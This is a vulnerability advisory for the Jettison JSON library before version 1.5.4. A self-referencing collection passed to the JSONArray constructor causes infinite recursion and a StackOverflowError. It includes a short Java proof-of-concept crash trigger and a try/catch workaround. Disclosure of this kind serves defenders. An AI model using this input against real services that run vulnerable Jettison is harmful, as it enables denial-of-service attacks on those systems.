Infinite recursion in Jettison leads to denial of service when creating a crafted JSONArray
org.codehaus.jettison:jettison
(,1.5.4)
An infinite recursion is triggered in Jettison when constructing a JSONArray from a Collection that contains a self-reference in one of its elements. This leads to a StackOverflowError exception being thrown.
public class POC {
public static void main(String[] args) throws JSONException {
ArrayList<Object> list = new ArrayList<>();
list.add(list);
JSONArray jsonArray = new JSONArray(list);
}
}
Wrap Jettison's JSONArray constructor with exception handling -
try {
JSONArray jsonArray = new JSONArray(list);
}
catch(StackOverflowError e) {
System.err.println("ERROR: Stack limit reached");
}
No references are supplied for this issue